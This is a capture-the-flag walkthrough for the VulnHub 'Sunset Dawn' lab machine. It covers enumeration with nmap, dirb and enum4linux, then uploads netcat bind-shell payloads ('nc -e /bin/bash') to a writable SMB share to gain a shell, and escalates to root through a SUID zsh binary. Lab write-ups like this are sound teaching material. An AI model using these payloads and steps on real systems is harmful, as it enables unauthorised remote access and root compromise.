SUNSET DAWN (VULNHUB)

LINK: https://download.vulnhub.com/sunset/dawn.zip

root@kali:~# nmap -A 192.168.1.165

Open ports: 80 (HTTP), 139/445 (SMB), 3306 (MySQL)

Enumeration :
on browser
http://192.168.1.165

root@kali:~# dirb http://192.168.1.165/

dirb finds the /logs/ directory

now on browser

http://192.168.1.165/logs/

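The /logs/ listing exposes management.log; download it. (The file names product-control and web-control used below presumably come from this log.)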

now on terminal

root@kali:~# cd Downloads

root@kali:~# cat management.log

root@kali:~# enum4linux -a 192.168.1.165

root@kali:~# smbclient //192.168.1.165/ITDEPT

smb: \> ls
smb: \> ls -al

root@kali:~# echo "nc -e /bin/bash -lvp 1234 &" > product-control
root@kali:~# echo "nc -e /bin/bash -lvp 1235 &" > web-control
root@kali:~# ls

root@kali:~# cat product-control

Back in the smbclient session, upload both files to the ITDEPT share:

smb: \> put product-control

smb: \> put web-control

smb: \> ls

on another terminal

root@kali:~# nc 192.168.1.165 1234

python -c 'import pty;pty.spawn("/bin/bash")'

Privilege Escalation:

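dawn@dawn:~$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/zsh is presumably in the SUID list (it is the binary run next). A shell binary with the SUID bit set is a misconfiguration: it runs with its owner's effective UID, which is why the second whoami differs from the first.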

dawn@dawn:~$ whoami
dawn@dawn:~$ /usr/bin/zsh
dawn@dawn:~$ whoami
dawn@dawn:~$ cd /root
dawn@dawn:~$ ls
dawn@dawn:~$ cat flag.txt

@SAKSHAM DIXIT